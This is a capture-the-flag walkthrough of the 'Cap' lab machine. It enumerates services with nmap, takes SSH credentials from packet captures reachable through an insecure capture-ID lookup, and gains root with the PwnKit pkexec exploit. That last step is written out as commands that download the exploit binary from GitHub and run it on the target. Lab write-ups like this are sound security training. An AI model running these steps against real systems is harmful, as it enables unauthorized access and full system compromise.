Cap Walkthrough
Nmap Scan#
nmap --privileged -sVC -v3 -oA output cap.htb
Running a comprehensive Nmap scan (-sVC for service/version detection and default scripts) revealed three open ports:
- Port 21 (FTP):
vsftpd 3.0.3 - Port 22 (SSH):
OpenSSH 8.2p1 (Ubuntu) - Port 80 (HTTP): running behind
Gunicornwith aSecurity Dashboardweb app.
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 (Ubuntu)
80/tcp open http Gunicorn (Security Dashboard)
With the HTTP service exposed, I proceeded to explore the web application.
Initial Access#
After discovering port 80 was open, I navigated to the app:
I found a Security Snapshot button, which led me to a packet capturing interface. It showed an ID 7 for my capture, suggesting previous captures were available. I fuzzed the capture IDs with Caido to enumerate and download all accessible captures.
Filtering by response length helped me weed out invalid or empty captures:
- Length
392filtered out all302errors. - Length
17300filtered out captures with no packets.
After downloading captures, IDs 5 and 4 were not useful.
However, the 0.pcap file contained credentials:
Using these credentials, I SSH’d into the machine as user nathan.
ssh nathan@cap.htb
Verified the login:
nathan@cap:~$ ifconfig && hostname && whoami
cap
nathan
Privilege Escalation#
I ran LinPEAS to identify privilege escalation vectors. The scan revealed that the binary pkexec has the SUID bit set, a known vulnerability.
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
This indicated the system was vulnerable to PwnKit (CVE-2021-4034). I downloaded the exploit script, transferred it to the target, and executed it to gain a root shell.
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
scp PwnKit nathan@cap.htb:~
chmod +x PwnKit
./PwnKit
With root access confirmed:
root@cap:/# whoami
root
Summary#
- Initial Access: Extracted SSH credentials from packet captures available via the web app.
- Privilege Escalation: Exploited vulnerable
pkexecbinary with PwnKit for root access.